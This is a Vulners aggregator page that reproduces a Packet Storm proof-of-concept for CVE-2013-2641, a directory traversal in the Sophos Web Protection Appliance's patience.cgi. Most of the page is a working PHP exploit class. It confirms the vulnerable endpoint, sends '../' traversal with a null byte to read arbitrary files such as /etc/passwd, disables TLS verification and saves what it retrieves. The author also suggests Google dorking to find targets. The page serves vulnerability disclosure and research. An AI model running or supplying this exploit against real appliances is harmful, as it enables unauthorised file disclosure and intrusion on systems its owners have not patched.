Vulners
Lucene search
๐ Sophos Web Virtual Appliance 3.7.0 Directory Traversal
๐๏ธย 20 Feb 2026ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 86ย Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution | 4 Apr 201300:00 | โ | zdt |
 | CVE-2013-2641 | 29 May 201815:50 | โ | circl |
 | Sophos Web Protection Appliance patience.cgi Directory Traversal (CVE-2013-2641) | 15 Oct 201300:00 | โ | checkpoint_advisories |
 | CVE-2013-2641 | 18 Mar 201414:00 | โ | cve |
 | CVE-2013-2641 | 18 Mar 201414:00 | โ | cvelist |
 | Sophos Web Protection Appliance 3.7.8.1 File Disclosure | 10 Feb 201400:00 | โ | dsquare |
| Sophos Web Protection Appliance 3.7.8.1 RCE | 10 Feb 201400:00 | โ | dsquare |
 | Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities | 8 Apr 201300:00 | โ | exploitdb |
 | Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities | 8 Apr 201300:00 | โ | exploitpack |
 | Sophos Web Protection Appliance patience.cgi Directory Traversal | 10 Sep 201304:30 | โ | metasploit |
10
=============================================================================================================================================
| # Title : Sophos Web Virtual Appliance v3.7.0 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.sophos.com/en-us/support/downloads/virtual-web-appliance |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: This code allows you to exploit the Traversal Directory vulnerability in the Sophos Web Protection Appliance to retrieve any file from the system.
cURL was used to execute HTTP requests, and the response was handled to verify the success of the attack and save the retrieved content to a local file.
(Related : https://packetstorm.news/files/id/180832/ Linked CVE numbers: CVE-2013-2641 ) .
[+] save code as poc.php.
[+] Set target : line 84
[+] PayLoad :
<?php
class SophosTraversalExploit {
private $target;
private $port;
private $filepath;
private $depth;
public function __construct($target, $port = 443, $filepath = '/etc/passwd', $depth = 2) {
$this->target = $target;
$this->port = $port;
$this->filepath = $filepath;
$this->depth = $depth;
}
private function my_basename($filename) {
return basename(str_replace('\\', '/', $filename));
}
private function is_proficy() {
$url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi";
$response = $this->send_request($url);
if ($response && strpos($response['body'], 'The patience page request was not valid') !== false) {
return true;
}
return false;
}
private function read_file() {
$traversal_path = str_repeat('../', $this->depth) . $this->filepath . "%00";
echo "Retrieving file contents...\n";
$url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi?id=" . urlencode($traversal_path);
$response = $this->send_request($url);
if ($response && ($response['code'] == 200 || $response['code'] == 500) && isset($response['headers']['X-Sophos-PatienceID'])) {
return $response['body'];
} else {
echo "Error: " . $response['code'] . "\n" . $response['body'] . "\n";
return null;
}
}
private function send_request($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$body = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$headers = curl_getinfo($ch);
curl_close($ch);
return ['code' => $code, 'body' => $body, 'headers' => $headers];
}
public function run() {
echo "Checking if it's a Sophos Web Protect Appliance with the vulnerable component...\n";
if ($this->is_proficy()) {
echo "Check successful\n";
} else {
echo "Sophos Web Protect Appliance vulnerable component not found\n";
return;
}
$contents = $this->read_file();
if ($contents === null) {
echo "File not downloaded\n";
return;
}
$file_name = $this->my_basename($this->filepath);
file_put_contents($file_name, $contents);
echo "File saved as: " . $file_name . "\n";
}
}
$exploit = new SophosTraversalExploit('target.com');
$exploit->run();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Feb 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 25
EPSS0.8235